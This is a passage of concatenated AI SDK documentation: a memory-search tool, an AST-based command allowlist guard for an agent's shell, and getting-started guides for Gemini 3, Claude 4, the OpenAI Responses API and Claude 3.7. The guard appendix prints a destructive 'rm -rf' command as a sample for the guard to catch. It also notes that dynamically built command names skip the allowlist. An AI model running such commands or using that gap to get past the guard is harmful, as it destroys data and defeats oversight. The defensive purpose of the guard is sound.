case 'search': {
if (!query) throw new Error('query is required for search');
const terms = query.toLowerCase().split(/\s+/).filter(Boolean);
const files = path
? [resolveMemoryPath(path)]
: MEMORY_FILES.map(f => join(MEMORY_ROOT, f));
const matches: string[] = [];
for (const filePath of files) {
const lines = (await readFile(filePath, 'utf8')).split('\n');
for (const [i, line] of lines.entries()) {
const lower = line.toLowerCase();
if (terms.some(t => lower.includes(t))) {
matches.push(`${relative(MEMORY_ROOT, filePath)}:${i + 1}:${line}`);
}
}
}
return matches.length > 0 ? matches.join('\n') : 'No matches found.';
}
}
}
Appendix: Command Guard
The AST-based command guard walks every node in the parsed command (including pipelines, subshells, loops, and conditionals) and rejects anything not in the allowlist. This is more robust than string matching or regex. If a command name is dynamically constructed (e.g., via variable expansion), extractLiteralWord returns null and the guard skips the allowlist check for that command. Since just-bash is a JavaScript-based interpreter (not a real shell), dynamically constructed commands that bypass the allowlist check fail to resolve to real binaries. This is an acceptable tradeoff.
import {
type CommandNode,
parse,
type ScriptNode,
type WordNode,
} from 'just-bash';
const approvedCommands = new Set([
'cat',
'echo',
'grep',
'jq',
'ls',
'mkdir',
'perl',
'sed',
'tail',
]);
function extractLiteralWord(word: WordNode | null): string | null {
if (!word || word.parts.length !== 1) return null;
const [part] = word.parts;
if (!part || part.type !== 'Literal') return null;
return part.value;
}
function collectCommandNames(script: ScriptNode): string[] {
const names = new Set<string>();
const visitCommand = (command: CommandNode): void => {
switch (command.type) {
case 'SimpleCommand': {
const name = extractLiteralWord(command.name);
if (name) names.add(name);
break;
}
case 'If': {
for (const clause of command.clauses) {
for (const s of clause.condition) visitStatement(s);
for (const s of clause.body) visitStatement(s);
}
if (command.elseBody) {
for (const s of command.elseBody) visitStatement(s);
}
break;
}
case 'For':
case 'CStyleFor':
case 'While':
case 'Until':
case 'Subshell':
case 'Group': {
for (const s of command.body) visitStatement(s);
break;
}
case 'Case': {
for (const item of command.items) {
for (const s of item.body) visitStatement(s);
}
break;
}
case 'FunctionDef': {
visitCommand(command.body);
break;
}
case 'ArithmeticCommand':
case 'ConditionalCommand':
break;
}
};
const visitStatement = (
statement: ScriptNode['statements'][number],
): void => {
for (const pipeline of statement.pipelines) {
for (const command of pipeline.commands) {
visitCommand(command);
}
}
};
for (const statement of script.statements) {
visitStatement(statement);
}
return [...names].sort();
}
export function findUnapprovedCommand(commandLine: string): string | null {
let script: ScriptNode;
try {
script = parse(commandLine);
} catch {
return null;
}
const commandNames = collectCommandNames(script);
return commandNames.find(name => !approvedCommands.has(name)) ?? null;
}
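A quick usage sketch (the command line is illustrative):
// 'rm' is not in the allowlist, so it is returned here
const offender = findUnapprovedCommand('ls -la | grep secret && rm -rf /tmp/x');
if (offender) {
  throw new Error(`Unapproved command: ${offender}`);
}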
title: Get started with Gemini 3
description: Get started with Gemini 3 using the AI SDK.
tags: ['getting-started']
Get started with Gemini 3
With the release of Gemini 3, Google's most intelligent model to date, there has never been a better time to start building AI applications that combine state-of-the-art reasoning with multimodal understanding.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Gemini 3 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Gemini 3
Gemini 3 represents a significant leap forward in AI capabilities, combining all of Gemini's strengths together to help you bring any idea to life. It delivers:
- State-of-the-art reasoning with unprecedented depth and nuance
- PhD-level performance on complex benchmarks like Humanity's Last Exam (37.5%) and GPQA Diamond (91.9%)
- Leading multimodal understanding with 81% on MMMU-Pro and 87.6% on Video-MMMU
- Best-in-class vibe coding and agentic capabilities
- Superior long-horizon planning for multi-step workflows
Gemini 3 Pro is currently available in preview, offering great performance across all benchmarks.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Gemini 3 with the AI SDK:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemini-3-pro-preview'),
prompt: 'Explain the concept of the Hilbert space.',
});
console.log(text);
Enhanced Reasoning with Thinking Mode
Gemini 3 models can use enhanced reasoning through thinking mode, which improves their ability to solve complex problems. You can control the thinking level using the thinkingLevel provider option:
import { google, GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemini-3-pro-preview'),
prompt: 'What is the sum of the first 10 prime numbers?',
providerOptions: {
google: {
thinkingConfig: {
includeThoughts: true,
thinkingLevel: 'low',
},
} satisfies GoogleLanguageModelOptions,
},
});
console.log(text);
The thinkingLevel parameter accepts different values to control the depth of reasoning applied to your prompt:
- Gemini 3 Pro supports: 'low' and 'high'
- Gemini 3 Flash supports: 'minimal', 'low', 'medium', and 'high'
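For lighter-weight requests, you might pair Flash with a minimal thinking level. A sketch, assuming a Gemini 3 Flash model id of 'gemini-3-flash-preview' (check the Google provider docs for the exact id):
import { google, GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
  // model id assumed for illustration
  model: google('gemini-3-flash-preview'),
  prompt: 'Summarize the plot of Hamlet in two sentences.',
  providerOptions: {
    google: {
      thinkingConfig: { thinkingLevel: 'minimal' },
    } satisfies GoogleLanguageModelOptions,
  },
});
console.log(text);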
Using Tools with the AI SDK
Gemini 3 excels at tool calling with improved reliability and consistency for multi-step workflows. Here's an example of using tool calling with the AI SDK:
import { z } from 'zod';
import { generateText, tool, stepCountIs } from 'ai';
import { google } from '@ai-sdk/google';
const result = await generateText({
model: google('gemini-3-pro-preview'),
prompt: 'What is the weather in San Francisco?',
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
stopWhen: stepCountIs(5), // enables multi-step calling
});
console.log(result.text);
console.log(result.steps);
Using Google Search with Gemini
With search grounding, Gemini can access the latest information using Google search. Here's an example of using Google Search with the AI SDK:
import { google, type GoogleProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-3-pro-preview'),
tools: {
google_search: google.tools.googleSearch({}),
},
prompt:
'List the top 5 San Francisco news from the past week.' +
'You must include the date of each article.',
});
// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
| GoogleProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;
console.log({ text, sources, groundingMetadata, safetyRatings });
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, SvelteKit, and SolidStart.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, and streamed JSON into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Gemini 3 Pro:
In a new Next.js application, first install the AI SDK and the Google provider:
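For example, with pnpm (the useChat hook used below comes from @ai-sdk/react):
pnpm add ai @ai-sdk/google @ai-sdk/react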
Then, create a route handler for the chat endpoint:
import { google } from '@ai-sdk/google';
import { streamText, UIMessage, convertToModelMessages } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: google('gemini-3-pro-preview'),
messages: await convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(message => (
<div key={message.id} className="whitespace-pre-wrap">
{message.role === 'user' ? 'User: ' : 'Gemini: '}
{message.parts.map((part, i) => {
switch (part.type) {
case 'text':
return <div key={`${message.id}-${i}`}>{part.text}</div>;
}
})}
</div>
))}
<form
onSubmit={e => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
}}
>
<input
className="fixed dark:bg-zinc-900 bottom-0 w-full max-w-md p-2 mb-8 border border-zinc-300 dark:border-zinc-800 rounded shadow-xl"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.currentTarget.value)}
/>
</form>
</div>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
- Read more about the Google provider.
title: Get started with Claude 4
description: Get started with Claude 4 using the AI SDK.
tags: ['getting-started']
Get started with Claude 4
With the release of Claude 4, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities and advanced intelligence.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Claude 4 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Claude 4
Claude 4 is Anthropic's most advanced model family to date, offering exceptional capabilities across reasoning, instruction following, coding, and knowledge tasks. Available in two variants—Sonnet and Opus—Claude 4 delivers state-of-the-art performance with enhanced reliability and control. Claude 4 builds on the extended thinking capabilities introduced in Claude 3.7, allowing for even more sophisticated problem-solving through careful, step-by-step reasoning.
Claude 4 excels at complex reasoning, code generation and analysis, detailed content creation, and agentic capabilities, making it ideal for powering sophisticated AI workflows, customer-facing agents, and applications requiring nuanced understanding and responses. Claude Opus 4 is an excellent coding model, leading on SWE-bench (72.5%) and Terminal-bench (43.2%), with the ability to sustain performance on long-running tasks that require focused effort and thousands of steps. Claude Sonnet 4 significantly improves on Sonnet 3.7, excelling in coding with 72.7% on SWE-bench while balancing performance and efficiency.
Prompt Engineering for Claude 4 Models
Claude 4 models respond well to clear, explicit instructions. The following best practices can help achieve optimal performance:
- Provide explicit instructions: Clearly state what you want the model to do, including specific steps or formats for the response.
- Include context and motivation: Explain why a task is being performed to help the model better understand the underlying goals.
- Avoid negative examples: When providing examples, only demonstrate the behavior you want to see, not what you want to avoid.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 4 Sonnet with the AI SDK:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-sonnet-4-20250514'),
prompt: 'How will quantum computing impact cryptography by 2050?',
});
console.log(text);
Reasoning Ability
Claude 4 enhances the extended thinking capabilities first introduced in Claude 3.7 Sonnet—the ability to solve complex problems with careful, step-by-step reasoning. Additionally, both Opus 4 and Sonnet 4 can now use tools during extended thinking, allowing Claude to alternate between reasoning and tool use to improve responses. You can enable extended thinking using the thinking provider option and specifying a thinking budget in tokens. For interleaved thinking (where Claude can think in between tool calls) you'll need to enable a beta feature using the anthropic-beta header:
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: anthropic('claude-sonnet-4-20250514'),
prompt: 'How will quantum computing impact cryptography by 2050?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 15000 },
} satisfies AnthropicLanguageModelOptions,
},
headers: {
'anthropic-beta': 'interleaved-thinking-2025-05-14',
},
});
console.log(text); // text response
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, SvelteKit, and SolidStart.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, and streamed JSON into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Claude Sonnet 4:
In a new Next.js application, first install the AI SDK and the Anthropic provider:
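For example, with pnpm:
pnpm add ai @ai-sdk/anthropic @ai-sdk/react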
Then, create a route handler for the chat endpoint:
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { streamText, convertToModelMessages, type UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: anthropic('claude-sonnet-4-20250514'),
messages: await convertToModelMessages(messages),
headers: {
'anthropic-beta': 'interleaved-thinking-2025-05-14',
},
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 15000 },
} satisfies AnthropicLanguageModelOptions,
},
});
return result.toUIMessageStreamResponse({
sendReasoning: true,
});
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({ api: '/api/chat' }),
});
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<div className="flex flex-col h-screen max-w-2xl mx-auto p-4">
<div className="flex-1 overflow-y-auto space-y-4 mb-4">
{messages.map(message => (
<div
key={message.id}
className={`p-3 rounded-lg ${
message.role === 'user' ? 'bg-blue-50 ml-auto' : 'bg-gray-50'
}`}
>
<p className="font-semibold">
{message.role === 'user' ? 'You' : 'Claude 4'}
</p>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return (
<div key={index} className="mt-1">
{part.text}
</div>
);
}
if (part.type === 'reasoning') {
return (
<pre
key={index}
className="bg-gray-100 p-2 rounded mt-2 text-xs overflow-x-auto"
>
<details>
<summary className="cursor-pointer">
View reasoning
</summary>
{part.text}
</details>
</pre>
);
}
})}
</div>
))}
</div>
<form onSubmit={handleSubmit} className="flex gap-2">
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
className="flex-1 p-2 border rounded focus:outline-none focus:ring-2 focus:ring-blue-500"
placeholder="Ask Claude 4 something..."
/>
<button
type="submit"
className="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-600"
>
Send
</button>
</form>
</div>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your LLM provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Claude 4 Model Variants
Claude 4 is available in two variants, each optimized for different use cases:
- Claude Sonnet 4: Balanced performance suitable for most enterprise applications, with significant improvements over Sonnet 3.7.
- Claude Opus 4: Anthropic's most powerful model and the best coding model available. Excels at sustained performance on long-running tasks that require focused effort and thousands of steps, with the ability to work continuously for several hours.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: OpenAI Responses API
description: Get started with the OpenAI Responses API using the AI SDK.
tags: ['getting-started', 'agents']
Get started with OpenAI Responses API
With the release of OpenAI's Responses API, there has never been a better time to start building AI applications, particularly those that require a deeper understanding of the world.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI Responses API
OpenAI recently released the Responses API, a brand new way to build applications on OpenAI's platform. The new API offers a way to persist chat history, a web search tool for grounding LLM responses, a file search tool for finding relevant files, and a computer use tool for building agents that can interact with and operate computers. Let's explore how to use the Responses API with the AI SDK.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call GPT-4o with the new Responses API using the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides generateText and streamText with Output to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateText, Output } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { output } = await generateText({
model: openai.responses('gpt-4o'),
output: Output.object({
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({ name: z.string(), amount: z.string() }),
),
steps: z.array(z.string()),
}),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
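Because the result is typed from the schema, you also get autocomplete and compile-time checks when reading it, for example:
console.log(output.recipe.name);
console.log(output.recipe.steps.length);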
Using Tools with the AI SDK
The Responses API supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:
import { generateText, tool, stepCountIs } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'What is the weather like today in San Francisco?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
stopWhen: stepCountIs(5), // enable multi-step 'agentic' LLM calls
});
This example demonstrates how stopWhen transforms a single LLM call into an agent. The stopWhen: stepCountIs(5) parameter allows the model to autonomously call tools, analyze results, and make additional tool calls as needed, turning what would be a simple one-shot completion into an agent that can chain multiple actions together to complete complex tasks.
Web Search Tool
The Responses API introduces a built-in web search tool for grounding responses, exposed in the AI SDK as openai.tools.webSearchPreview. With this tool, the model can access the internet to find relevant information for its responses.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search_preview: openai.tools.webSearchPreview(),
},
});
console.log(result.text);
console.log(result.sources);
The web search tool also allows you to specify query-specific metadata that can be used to improve the quality of the search results.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search_preview: openai.tools.webSearchPreview({
searchContextSize: 'high',
userLocation: {
type: 'approximate',
city: 'San Francisco',
region: 'California',
},
}),
},
});
console.log(result.text);
console.log(result.sources);
MCP Tool
The Responses API also supports connecting to Model Context Protocol (MCP) servers. This allows models to call tools exposed by remote MCP servers or service connectors.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.responses('gpt-5-mini'),
prompt: 'Search the web for the latest NYC mayoral election results',
tools: {
mcp: openai.tools.mcp({
serverLabel: 'web-search',
serverUrl: 'https://mcp.exa.ai/mcp',
serverDescription: 'A web-search API for AI agents',
}),
},
});
console.log(result.text);
For more details on configuring the MCP tool, including authentication, tool filtering, and connector support, see the OpenAI provider documentation.
Using Persistence
With the Responses API, you can persist chat history with OpenAI across requests. This allows you to send just the user's last message and OpenAI can access the entire chat history.
There are two options available to use persistence:
With previousResponseId
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result1 = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'Invent a new holiday and describe its traditions.',
});
const result2 = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'Summarize in 2 sentences',
providerOptions: {
openai: {
previousResponseId: result1.providerMetadata?.openai.responseId as string,
},
},
});
With Conversations
You can use the Conversation API to create a conversation.
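A minimal sketch of creating one via OpenAI's REST endpoint (assumes OPENAI_API_KEY is set; see OpenAI's Conversations API docs for the full request shape):
const res = await fetch('https://api.openai.com/v1/conversations', {
  method: 'POST',
  headers: {
    Authorization: `Bearer ${process.env.OPENAI_API_KEY}`,
    'Content-Type': 'application/json',
  },
  body: JSON.stringify({}),
});
const { id } = await res.json(); // e.g. 'conv_123'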
Once you have created a conversation, you can continue it:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'Summarize in 2 sentences',
providerOptions: {
openai: {
// The Conversation ID created via the OpenAI API to continue
conversation: 'conv_123',
},
},
});
Migrating from Completions API
Migrating from the OpenAI Completions API (via the AI SDK) to the new Responses API is straightforward: change your model instance from openai(modelId) to openai.responses(modelId):
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Completions API
const { text } = await generateText({
model: openai('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
});
// Responses API
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
});
When using the Responses API, provider-specific options that were previously specified on the model provider instance have now moved to the providerOptions object:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Completions API
const { text } = await generateText({
model: openai('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
providerOptions: {
openai: {
parallelToolCalls: false,
},
},
});
// Responses API
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
providerOptions: {
openai: {
parallelToolCalls: false,
},
},
});
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: Google Gemini Image Generation
description: Generate and edit images with Google Gemini 2.5 Flash Image using the AI SDK.
tags: ['image-generation', 'google', 'gemini']
Generate and Edit Images with Google Gemini 2.5 Flash
This guide will show you how to generate and edit images with the AI SDK and Google's latest multimodal language model, Gemini 2.5 Flash Image.
Generating Images
As Gemini 2.5 Flash Image is a language model with multimodal capabilities, you can use the generateText or streamText functions (not generateImage) to create images. The model determines which modality to respond in based on your prompt and configuration. Here's how to create your first image:
import { generateText } from 'ai';
import fs from 'node:fs';
import 'dotenv/config';
async function generateImage() {
const result = await generateText({
model: 'google/gemini-2.5-flash-image',
prompt:
'Create a picture of a nano banana dish in a fancy restaurant with a Gemini theme',
});
// Save generated images
for (const file of result.files) {
if (file.mediaType.startsWith('image/')) {
const timestamp = Date.now();
const fileName = `generated-${timestamp}.png`;
fs.mkdirSync('output', { recursive: true });
await fs.promises.writeFile(`output/${fileName}`, file.uint8Array);
console.log(`Generated and saved image: output/${fileName}`);
}
}
}
generateImage().catch(console.error);
Here are some key points to remember:
- Generated images are returned in the result.files array
- Images are returned as Uint8Array data
- The model leverages Gemini's world knowledge, so detailed prompts yield better results
Editing Images
Gemini 2.5 Flash Image excels at editing existing images with natural language instructions. You can add elements, modify styles, or transform images while maintaining their core characteristics:
import { generateText } from 'ai';
import fs from 'node:fs';
import 'dotenv/config';
async function editImage() {
const editResult = await generateText({
model: 'google/gemini-2.5-flash-image',
prompt: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Add a small wizard hat to this cat. Keep everything else the same.',
},
{
type: 'image',
// image: DataContent (string | Uint8Array | ArrayBuffer | Buffer) or URL
image: new URL(
'https://raw.githubusercontent.com/vercel/ai/refs/heads/main/examples/ai-functions/data/comic-cat.png',
),
mediaType: 'image/jpeg',
},
],
},
],
});
// Save the edited image
const timestamp = Date.now();
fs.mkdirSync('output', { recursive: true });
for (const file of editResult.files) {
if (file.mediaType.startsWith('image/')) {
await fs.promises.writeFile(
`output/edited-${timestamp}.png`,
file.uint8Array,
);
console.log(`Saved edited image: output/edited-${timestamp}.png`);
}
}
}
editImage().catch(console.error);
What's Next?
You've learned how to generate new images from text prompts and edit existing images using natural language instructions with Google's Gemini 2.5 Flash Image model.
For more advanced techniques, integration patterns, and practical examples, check out our Cookbook where you'll find comprehensive guides for building sophisticated AI-powered applications.
title: Get started with Claude 3.7 Sonnet
description: Get started with Claude 3.7 Sonnet using the AI SDK.
tags: ['getting-started']
Get started with Claude 3.7 Sonnet
With the release of Claude 3.7 Sonnet, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Claude 3.7 Sonnet alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Claude 3.7 Sonnet
Claude 3.7 Sonnet is Anthropic's most intelligent model to date and the first Claude model to offer extended thinking—the ability to solve complex problems with careful, step-by-step reasoning. With Claude 3.7 Sonnet, you can balance speed and quality by choosing between standard thinking for near-instant responses and extended thinking for advanced reasoning. Claude 3.7 Sonnet is state-of-the-art for coding and delivers advancements in computer use, agentic capabilities, complex reasoning, and content generation. With frontier performance and more control over speed, Claude 3.7 Sonnet is a great choice for powering AI agents, especially customer-facing agents, and complex AI workflows.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 3.7 Sonnet with the AI SDK:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-3-7-sonnet-20250219'),
prompt: 'How many people will live in the world in 2040?',
});
console.log(text); // text response
The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use Claude 3.7 Sonnet via Amazon Bedrock:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const { text } = await generateText({
model: bedrock('anthropic.claude-3-7-sonnet-20250219-v1:0'),
prompt: 'How many people will live in the world in 2040?',
});
Reasoning Ability
Claude 3.7 Sonnet introduces extended thinking: the ability to solve complex problems with careful, step-by-step reasoning. You can enable it using the thinking provider option and specifying a thinking budget in tokens:
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: anthropic('claude-3-7-sonnet-20250219'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
} satisfies AnthropicLanguageModelOptions,
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, and streamed JSON into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Claude 3.7 Sonnet:
In a new Next.js application, first install the AI SDK and the Anthropic provider:
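For example, with pnpm:
pnpm add ai @ai-sdk/anthropic @ai-sdk/react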
Then, create a route handler for the chat endpoint:
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { streamText, convertToModelMessages, type UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: anthropic('claude-3-7-sonnet-20250219'),
messages: await convertToModelMessages(messages),
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
} satisfies AnthropicLanguageModelOptions,
},
});
return result.toUIMessageStreamResponse({
sendReasoning: true,
});
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({ api: '/api/chat' }),
});
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
// text parts:
if (part.type === 'text') {
return <div key={index}>{part.text}</div>;
}
// reasoning parts:
if (part.type === 'reasoning') {
return <pre key={index}>{part.text}</pre>;
}
})}
</div>
))}
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Send</button>
</form>
</>
);
}
